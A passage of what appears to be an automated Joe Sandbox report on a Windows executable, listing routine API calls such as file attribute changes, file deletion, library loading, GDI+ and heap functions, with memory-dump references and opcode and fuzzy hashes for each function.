                                                                                                      • Opcode Fuzzy Hash: 6fdaf5310a74109ed3034cb8740470d2ecae4c4bbfa459b2bfd9f4274e52fe6b
                                                                                                      • Instruction Fuzzy Hash: 98E09232E0412E679F18C6A89C14DFF739DEE04300724417AEE97D3A00FA74DD0247A4
                                                                                                      APIs
                                                                                                      • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,009F9EF9,?,?,?,009F9D92,?,00000001,00000000,?,?), ref: 009FA0D7
                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,009F9EF9,?,?,?,009F9D92,?,00000001,00000000,?,?), ref: 009FA108
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 3188754299-0
                                                                                                      • Opcode ID: d13d59d401446e8e0fc238e9173ddd8e14f3d500e4758530fa8fca1184db245a
                                                                                                      • Instruction ID: bdf6e0d0ed14ef069f976d057c722f1d7c731f2fd6e17d100fa6370e8c4e8101
                                                                                                      • Opcode Fuzzy Hash: d13d59d401446e8e0fc238e9173ddd8e14f3d500e4758530fa8fca1184db245a
                                                                                                      • Instruction Fuzzy Hash: 1FF0373124410DABDF215F54DC01BF9776DBB14385F444061B948D6155DB3199559B50
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemText_swprintf
                                                                                                      • String ID:
                                                                                                      • API String ID: 3011073432-0
                                                                                                      • Opcode ID: b7dde714fc0d4e615697f696470ee80914a0c7fd36d82e08a34aec643bc132de
                                                                                                      • Instruction ID: 3a1fcd113286168b62afb804a1e8f4f1e6d005fc33be4440e535e9268d501677
                                                                                                      • Opcode Fuzzy Hash: b7dde714fc0d4e615697f696470ee80914a0c7fd36d82e08a34aec643bc132de
                                                                                                      • Instruction Fuzzy Hash: 21F0EC3255424CB7E711FBB0AD06FAA3B1DAB05381F044156B605920E2D6725E21D751
                                                                                                      APIs
                                                                                                      • DeleteFileW.KERNELBASE(?,?,?,009F9611,?,?,009F946C), ref: 009F9DBD
                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,009F9611,?,?,009F946C), ref: 009F9DEB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DeleteFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 4033686569-0
                                                                                                      • Opcode ID: 39fbff8b8686d43f4b7c32017db5cfde498b4a6b9f914143a5a3303d3f45fd11
                                                                                                      • Instruction ID: 59dd36ae09e12b1e2c109860cd08e89ef6532efeb1ae8d7c7358866bfc6c1997
                                                                                                      • Opcode Fuzzy Hash: 39fbff8b8686d43f4b7c32017db5cfde498b4a6b9f914143a5a3303d3f45fd11
                                                                                                      • Instruction Fuzzy Hash: ACE09231A5020DAFEB209FA5DC41FFA779DEB09381F844071BA88C2091DB319D969A90
                                                                                                      APIs
                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,009F9E08,?,009F75A0,?,?,?,?), ref: 009F9E24
                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,009F9E08,?,009F75A0,?,?,?,?), ref: 009F9E50
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 3188754299-0
                                                                                                      • Opcode ID: 96376b101af2eff27769520a585615cf6c944989085cd0c3c70ca48d725761a0
                                                                                                      • Instruction ID: bdb92105bdccd5a68eb447582983cacd10641848389630fd3de276a9ab345369
                                                                                                      • Opcode Fuzzy Hash: 96376b101af2eff27769520a585615cf6c944989085cd0c3c70ca48d725761a0
                                                                                                      • Instruction Fuzzy Hash: 19E0653250015C57DB20EBA8DC05BE97B6CAB087A1F000271FE58E7191D6705D8587D4
                                                                                                      APIs
                                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 009FF324
                                                                                                      • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,009FDEC8,Crypt32.dll,?,009FDF4A,?,009FDF2E,?,?,?,?), ref: 009FF346
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DirectoryLibraryLoadSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 1175261203-0
                                                                                                      • Opcode ID: 53e4c3c27bdb50ebf2c57a8ebfcd88da4a2f0444ee96a87c8170e4596c333648
                                                                                                      • Instruction ID: 16fc365eaa770a9eb863f725dd28389d4a826e3202848f95f8b1d43391f17e87
                                                                                                      • Opcode Fuzzy Hash: 53e4c3c27bdb50ebf2c57a8ebfcd88da4a2f0444ee96a87c8170e4596c333648
                                                                                                      • Instruction Fuzzy Hash: CFE0127281512CA7DB11EBE4DC05FEB776CEF0C3D1F0440A6BA48D2005DA7499418BB0
                                                                                                      APIs
                                                                                                      • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00A08945
                                                                                                      • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00A0894C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: BitmapCreateFromGdipStream
                                                                                                      • String ID:
                                                                                                      • API String ID: 1918208029-0
                                                                                                      • Opcode ID: ee4d72bbd804a781f608bcb7f53c86769da67bc6f6ed4fd752c28d8f352d54e4
                                                                                                      • Instruction ID: 7840b1b880ae581fdd832be8e85ac969c0dbfad78f2cdcd9e1c6c252c8943c0e
                                                                                                      • Opcode Fuzzy Hash: ee4d72bbd804a781f608bcb7f53c86769da67bc6f6ed4fd752c28d8f352d54e4
                                                                                                      • Instruction Fuzzy Hash: FFE06D7180121CEFCB50EF88E501BA9BBF8EF08361F10816AE88493640E674AE009B92
                                                                                                      APIs
                                                                                                      • GdiplusShutdown.GDIPLUS(?,?,?,00A1F79B,000000FF), ref: 00A090C7
                                                                                                      • CoUninitialize.COMBASE(?,?,?,00A1F79B,000000FF), ref: 00A090CC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: GdiplusShutdownUninitialize
                                                                                                      • String ID:
                                                                                                      • API String ID: 3856339756-0
                                                                                                      • Opcode ID: 2bb8d234fcfc7d33136b795cc5c3271279ca83a758541a134a7b68445c400d37
                                                                                                      • Instruction ID: 6ce85b9651dd6c89645bcee280d70c0afe0ab8c9ad5244fc1bf548d350189539
                                                                                                      • Opcode Fuzzy Hash: 2bb8d234fcfc7d33136b795cc5c3271279ca83a758541a134a7b68445c400d37
                                                                                                      • Instruction Fuzzy Hash: CDE01A32544A44AFC324DB8CED45B55BBE9FB09B20F004769B81A93BA0CB386C44CB91
                                                                                                      APIs
                                                                                                        • Part of subcall function 00A11D9A: try_get_function.LIBVCRUNTIME ref: 00A11DAF
                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A10CC4
                                                                                                      • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00A10CCF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                      • String ID:
                                                                                                      • API String ID: 806969131-0
                                                                                                      • Opcode ID: 0f7f305983b7b4ed229d8e4acd88ce0b62c555cb93e2bd95e900d9f1d9cdbadf
                                                                                                      • Instruction ID: 6b221a44e782963c067820ad493b6d1f3381b3feebea4e8a1006c838a17ef560
                                                                                                      • Opcode Fuzzy Hash: 0f7f305983b7b4ed229d8e4acd88ce0b62c555cb93e2bd95e900d9f1d9cdbadf
                                                                                                      • Instruction Fuzzy Hash: 6AD0A93A68C301281D1063F56B22CEA3348A922BB47A00B46E421991C2EAE080C2AA92
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemShowWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 3351165006-0
                                                                                                      • Opcode ID: 6a8165f23d4c1dd1dbf5b0ee88e9d9f579c49e0224b6dcb618d83db1502e608f
                                                                                                      • Instruction ID: 4b70531390ecc355aad17609305f5f10fc6fd081db760547db275aeae93a83e4
                                                                                                      • Opcode Fuzzy Hash: 6a8165f23d4c1dd1dbf5b0ee88e9d9f579c49e0224b6dcb618d83db1502e608f
                                                                                                      • Instruction Fuzzy Hash: 02C01232058100BFCB014BB4DC19C3EBBA99BA5312F00C914B8A5C0060C238C811DB12
                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(00A31E74,?,?,?,?,009FA5A0,?,?,?,?,00A1F79B,000000FF), ref: 009FFC42
                                                                                                      • LeaveCriticalSection.KERNEL32(00A31E74,?,?,?,?,009FA5A0,?,?,?,?,00A1F79B,000000FF), ref: 009FFC99
                                                                                                        • Part of subcall function 009FF9D1: ReleaseSemaphore.KERNEL32(?,00000020,00000000), ref: 009FFA05
                                                                                                        • Part of subcall function 009FF9D1: CloseHandle.KERNEL32(?,?), ref: 009FFA1F
                                                                                                        • Part of subcall function 009FF9D1: DeleteCriticalSection.KERNEL32(?), ref: 009FFA38
                                                                                                        • Part of subcall function 009FF9D1: CloseHandle.KERNELBASE(?), ref: 009FFA44
                                                                                                        • Part of subcall function 009FF9D1: CloseHandle.KERNEL32(?), ref: 009FFA50
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCriticalHandleSection$DeleteEnterLeaveReleaseSemaphore
                                                                                                      • String ID:
                                                                                                      • API String ID: 3265325312-0
                                                                                                      • Opcode ID: c443f09fa030a5a75c32ba9193e540e915f2212a7406cf67f2d3dad8534f5603
                                                                                                      • Instruction ID: 399ad7533fd455f3598dd51905327a669701cf2fefd37439b3d34ebb68db34c2
                                                                                                      • Opcode Fuzzy Hash: c443f09fa030a5a75c32ba9193e540e915f2212a7406cf67f2d3dad8534f5603
                                                                                                      • Instruction Fuzzy Hash: 89F0C83320423C5BD621A724EC9097EB75CDF857643260136FE40A3152EB76AC4283A4
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog
                                                                                                      • String ID:
                                                                                                      • API String ID: 3519838083-0
                                                                                                      • Opcode ID: 17d19357f272c80dade230d1a6be520d78dc7a9b98b41592ab9ed9414d982344
                                                                                                      • Instruction ID: 33d51314767aaf19f752df20d7b477f5e99089c5bda697b8d824822c92a57295
                                                                                                      • Opcode Fuzzy Hash: 17d19357f272c80dade230d1a6be520d78dc7a9b98b41592ab9ed9414d982344
                                                                                                      • Instruction Fuzzy Hash: FBB1E570A0064AEFEB18CF78C484BF9FBA9FF15304F14425AD6A597281C73598A4CBD1
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 009F8210
                                                                                                        • Part of subcall function 009F137E: __EH_prolog.LIBCMT ref: 009F1383
                                                                                                        • Part of subcall function 009F137E: new.LIBCMT ref: 009F13FB
                                                                                                        • Part of subcall function 009F19B1: __EH_prolog.LIBCMT ref: 009F19B6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog
                                                                                                      • String ID:
                                                                                                      • API String ID: 3519838083-0
                                                                                                      • Opcode ID: f93cef537962b12b2bb8292643bd7a59b8c6e4d3b1be666dd9ef81cc8a91fab5
                                                                                                      • Instruction ID: af80f5ee8ad192d64b2a985589fb42ead9a93a0159ff646c909b68c57bf4dda4
                                                                                                      • Opcode Fuzzy Hash: f93cef537962b12b2bb8292643bd7a59b8c6e4d3b1be666dd9ef81cc8a91fab5
                                                                                                      • Instruction Fuzzy Hash: EA41A37194065C9ADF24DB60CC51BFA736DAF50314F0404EAE68A93092DFB46FC8DB50
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog
                                                                                                      • String ID:
                                                                                                      • API String ID: 3519838083-0
                                                                                                      • Opcode ID: 8e5f03b15dd71758e642be493344ff701725d2365446797cb6a26bf1a1634f37
                                                                                                      • Instruction ID: f5ab1926983f1cab24dfb37c851c7b0be766b75ae114c1ad9da011e37e211f6d
                                                                                                      • Opcode Fuzzy Hash: 8e5f03b15dd71758e642be493344ff701725d2365446797cb6a26bf1a1634f37
                                                                                                      • Instruction Fuzzy Hash: 1321A5B2E40319ABDB14DFB8ED457AB7668FB18314F00063AE505EB6C1D7709D40C7A8
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 00A0948A
                                                                                                        • Part of subcall function 009F137E: __EH_prolog.LIBCMT ref: 009F1383
                                                                                                        • Part of subcall function 009F137E: new.LIBCMT ref: 009F13FB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog
                                                                                                      • String ID:
                                                                                                      • API String ID: 3519838083-0
                                                                                                      • Opcode ID: 8a220ec651a1c2b7e25f6baa790324e13159d7b711b2dee2777a329fb3e0c2f7
                                                                                                      • Instruction ID: 8d5142a31c8911c0a81b9ed67d21240d4e477549a0cb61467709c32f549f6bb6
                                                                                                      • Opcode Fuzzy Hash: 8a220ec651a1c2b7e25f6baa790324e13159d7b711b2dee2777a329fb3e0c2f7
                                                                                                      • Instruction Fuzzy Hash: 66214C76D0424DDACF15DF95D941AEEB7B4AF59300F1004AEE809A7242D7356E05DBA0
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog
                                                                                                      • String ID:
                                                                                                      • API String ID: 3519838083-0
                                                                                                      • Opcode ID: c4b5e864f54bcad631fc60039dc4f92b8c814556d7cbba7e08f45f6c00474736
                                                                                                      • Instruction ID: 9bedd274dedfe327ae759e8f51ca2ee196f257dd65a207840ae32590319340ca
                                                                                                      • Opcode Fuzzy Hash: c4b5e864f54bcad631fc60039dc4f92b8c814556d7cbba7e08f45f6c00474736
                                                                                                      • Instruction Fuzzy Hash: 27118273A0442EABCF11AF98CD95BFEB73AAF88750F004525FA15B7211CA309C1087E0
                                                                                                      APIs
                                                                                                        • Part of subcall function 00A15A8D: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00A1634D,00000001,00000364,?,00A12213,?,?,00A2CBE8), ref: 00A15ACE
                                                                                                      • _free.LIBCMT ref: 00A18F50
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 614378929-0
                                                                                                      • Opcode ID: ffe7a698f1ec9d313924040038d8a651e71016dbf9af90b8887af046bf84921e
                                                                                                      • Instruction ID: 0358ada6da677bbbbc20ad1dad277bac897a62eb49379e1113dd7042db443a15
                                                                                                      • Opcode Fuzzy Hash: ffe7a698f1ec9d313924040038d8a651e71016dbf9af90b8887af046bf84921e
                                                                                                      • Instruction Fuzzy Hash: E701FE726043459BE7218F69D845D99FBE9EB85370F25055DE59483280EB306C45C774
                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00A1634D,00000001,00000364,?,00A12213,?,?,00A2CBE8), ref: 00A15ACE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: a07cbab229e8143874e11d71ef6d550087d68c140c1e6403a4358524e5be6366
